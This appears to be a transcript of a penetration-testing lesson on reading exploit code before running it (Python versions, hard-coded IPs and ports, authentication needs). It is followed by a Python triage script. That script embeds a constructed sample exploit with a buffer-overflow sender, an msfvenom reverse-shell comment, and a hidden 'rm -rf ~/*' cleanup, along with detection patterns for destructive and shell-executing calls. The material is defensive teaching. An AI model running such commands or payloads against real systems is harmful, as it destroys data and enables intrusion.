Understanding the code

Our learning objectives are to understand how to analyze exploit code, interpret what the code does, and check if the exploit code is malicious to our own machines.
I did some bash scripting and I did some Python scripting, and still now I just say I can script. But you do generally need to know what code does, and you did that in the buffer overflow lab; that whole module is you writing code. You're writing code to exploit a buffer overflow vulnerability in Python.

And if you noticed, it was written in Python 2, and now we're using Python 3, and even that takes some getting used to. If you know Python 2, you need to know how to modify that code to fit Python 3, and you'll notice that the author of dostackbufferoverflowgood talks about his exploit code, how he changed it, and how it has to be changed to fit Python 3. But if you know Python 2 and you look at a Python 3 script, you generally know what's going on. It's like, you know, I can speak Spanish, and I also have heard people speak Italian, and I know that some words can be very similar. So it is kind of like that, and it goes the same with other types of code. I don't know Java, I don't know C#, but I should at least study enough to know what the code is doing, because the worst thing that could happen is I pull somebody's code from GitHub and I have no idea what it does, and it just DoSes my box because someone thought it would be funny if someone pulled code from their website, and now they're laughing at us because we've erased all of our files or they've created a backdoor. So again, it is really important to know what the code is doing. So know enough of the code. And also, that's being a good pen tester, right? You have to be able to explain to a client the exploit that you used and what it did. And if you have no idea, well, you don't look like a very professional pen tester. So that's why you should know what the code does.
So of course you have to actually read the code, and a lot of this code will have comments in it. And that's why I picked this Konica Minolta vulnerability: because it's a buffer overflow, which we just did, so you're used to looking at that code. And the other thing is there are lots of comments in that code, so it's very verbose and it's very helpful. So you'll notice in things like the Dirty COW exploit, and a lot of those, that they will tell you how to compile that code correctly. And that's what will happen when you get these kernel exploits: you have to compile them correctly so that they work, and if you don't, well, then it's not going to work correctly. So if someone is doing a good job of being helpful to other hackers, they're going to put comments in their code to help us understand what it does.

You'll also notice a lot of the time there's hard-coded information; there are hard-coded ports. Someone's going to assume an FTP vulnerability is going to be on port 21, or SSH is on port 22. As we've seen, that's not always the case. People change ports, so be cognizant of that. You saw the SMTP one was port 25. What if it's on port 2525 or some other random port? So you have to be able to spot those IP addresses that are hard-coded, as well as the ports, and change them if necessary.
So again, we're looking at this Konica Minolta exploit script, and I talked about this before. He tells you a lot: what software it was tested on, what version of Windows it was tested on, how to set up a netcat listener, and what it looks like when the exploit works, as you should get this command line prompt on the Windows box. Also realize: is this Python 2 or is this Python 3, with the shebang /usr/bin/python? So be aware of that. If you're trying to run Python 3 on this code, will it work? So again, know what version of Python this looks like or is.

So you'll also notice in this code a hard-coded IP address with msfvenom. We've used msfvenom a lot. The listening host you see is hard-coded and the listening port is hard-coded. That is of course something that we're going to have to change in our environment, because we're not going to have the same IP address, I can bet you that.
Also notice with exploits whether you have to be authenticated or not. If you don't have the login credentials, well, then it's not going to work, right? Because you need to have the username and password to authenticate into the application to exploit the vulnerability. You can see this is a WordPress plugin that only works if you're authenticated into the application. You'll notice that with a lot of WordPress plugins: you have to be authenticated to exploit it. Well, pay attention to that, and you should notice that with your WPScan output. I prioritize the unauthenticated over the authenticated if I don't have a login and password, right? Because it's going to be a whole lot easier for an unauthenticated file upload vulnerability than an authenticated SQL injection.

Also be aware it has http://vulnerablesite.com. Of course ours isn't going to say vulnerablesite.com. Ours could be an IP address, and we could have a different WordPress directory; it could be, you know, 192.168.1.7/wordpress and then wp-admin. So realize that, right here with action, you may have to change the vulnerable site and the path of this site to have your exploit work.
So in summary, we should now understand how to analyze exploit code. I know you're not going to be an expert. I really recommend taking some basic coding classes, like Python; I know Python is very popular. But just so you generally understand what code does. You should be able to interpret what the exploit code does. Google, again, is your friend. If you just want to Google certain syntax, you know, what's import sys or import socket in Python, what is that doing? Google it. You know, it's in your code for the FTP vulnerability. What are libraries in Python? You should know what those are. And also check if the exploit code is malicious to your own machine. Of course, you know, we've done command line labs, and they note this in the PWK material that some code that they saw, like, removed everything within the box, rm -rf, you know, it removes everything and it's a malicious script. So that's why I talk about GitHub and being careful. Exploit-DB, if there's a check mark, I wouldn't worry so much about, but know where you're downloading the code from, and check and make sure you understand what the code does, because again, a good pen tester is going to be able to explain to a client what the code is doing and why this exploit code is working. So I will see you in the next lesson.
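As an added example, not the instructor's code and not taken from the Konica Minolta or WordPress scripts discussed in the lesson, here is a small Python 3 triage script that does the checks described in this lesson mechanically before you run someone else's exploit: it guesses Python 2 versus Python 3 from the shebang and syntax, lists every hard-coded IP address and port (target host, msfvenom LHOST/LPORT) so you know what to change for your own lab, and flags shell-executing or destructive calls such as rm -rf. The exploit text embedded in it is constructed for the demo; the 192.168.1.x addresses, the FTP port and the "cleanup" function are placeholders, not a real advisory.

```python
import re

# Constructed sample exploit (not a real advisory). It has the same tell-tales the
# lesson points out: a bare "python" shebang, a Python 2 print statement, a
# hard-coded target and msfvenom listener, and a "cleanup" that would wipe the
# tester's own home directory.
SAMPLE_EXPLOIT = r'''#!/usr/bin/python
# Tested on: Windows 7 SP1 x86 (constructed sample)
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f python -b "\x00"
import socket, os

target = "192.168.1.10"
port = 21
buf = "\x41" * 1024

def cleanup():
    os.system("rm -rf ~/*")   # "removes logs"

print "[*] sending payload to %s:%d" % (target, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send("USER " + buf + "\r\n")
s.close()
cleanup()
'''

IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
# Ports assigned by name: port = 21, LPORT=4444, target_port: 80
PORT_RE = re.compile(r'\b\w*port\s*[=:]\s*["\']?(\d{1,5})\b', re.I)

# Syntax that only parses under Python 2. The print check is a heuristic: it also
# trips on "print (x)" with a space, which is legal Python 3.
PY2_MARKERS = {
    "print statement": re.compile(r'^\s*print\s+(?!\()', re.M),
    "raw_input()": re.compile(r'\braw_input\s*\('),
    "xrange()": re.compile(r'\bxrange\s*\('),
    "except X, e:": re.compile(r'^\s*except\s+\w+\s*,\s*\w+\s*:', re.M),
}

# Calls that must be read and understood before the script is ever executed.
DANGEROUS = {
    "recursive delete (rm -rf)": re.compile(r'\brm\s+-\w*[rR]\w*[fF]|\brm\s+-\w*[fF]\w*[rR]'),
    "shell command execution": re.compile(r'\b(?:os\.system|os\.popen|subprocess\.(?:call|run|Popen|check_output))\s*\('),
    "dynamic code execution": re.compile(r'\b(?:eval|exec)\s*\('),
    "encoded blob (decode and read it)": re.compile(r'\b(?:base64\.b64decode|binascii\.unhexlify|zlib\.decompress)\s*\('),
    "recursive directory removal": re.compile(r'\bshutil\.rmtree\s*\('),
}


def detect_python_version(src):
    """Guess whether a script is written for Python 2 or 3 and say why."""
    first = src.splitlines()[0] if src else ""
    reasons = []
    if first.startswith("#!"):
        if "python3" in first:
            return "python3", ["shebang: " + first]
        if "python2" in first:
            reasons.append("shebang: " + first)
    for name, rx in PY2_MARKERS.items():
        if rx.search(src):
            reasons.append(name)
    if reasons:
        return "python2", reasons
    if re.search(r'\bf["\']', src):          # f-strings exist only in Python 3.6+
        return "python3", ["f-string literal"]
    return "unknown", ["no version-specific syntax found; try both interpreters"]


def find_hardcoded_network(src):
    """Return (kind, value, lineno, line) for every hard-coded IP and named port."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for ip in IPV4_RE.findall(line):
            hits.append(("ip", ip, lineno, line.strip()))
        for m in PORT_RE.finditer(line):
            hits.append(("port", m.group(1), lineno, line.strip()))
    return hits


def find_dangerous_calls(src):
    """Return (label, lineno, line) for each line that matches a DANGEROUS pattern."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for label, rx in DANGEROUS.items():
            if rx.search(line):
                hits.append((label, lineno, line.strip()))
    return hits


def triage(src):
    """Summarise what to change and what to worry about before running the script."""
    version, reasons = detect_python_version(src)
    net = find_hardcoded_network(src)
    danger = find_dangerous_calls(src)
    return {
        "python_version": version,
        "version_reasons": reasons,
        "hardcoded_ips": sorted({h[1] for h in net if h[0] == "ip"}),
        "hardcoded_ports": sorted({int(h[1]) for h in net if h[0] == "port"}),
        "dangerous": danger,
        "verdict": "DO NOT RUN until every flagged line is understood" if danger
                   else "no obvious destructive calls; still read it end to end",
    }


if __name__ == "__main__":
    import sys
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_EXPLOIT
    for key, value in triage(src).items():
        print(f"{key}: {value}")
```

Run it as `python3 triage.py exploit.py` against a downloaded script, or with no argument to see the constructed sample flagged: Python 2 (print statement), two IPs and two ports to change, and the rm -rf hidden in cleanup() on its line number. The checks are regex heuristics, so a match is a prompt to read that line, not proof of malice, and a clean report is not a reason to skip reading the rest.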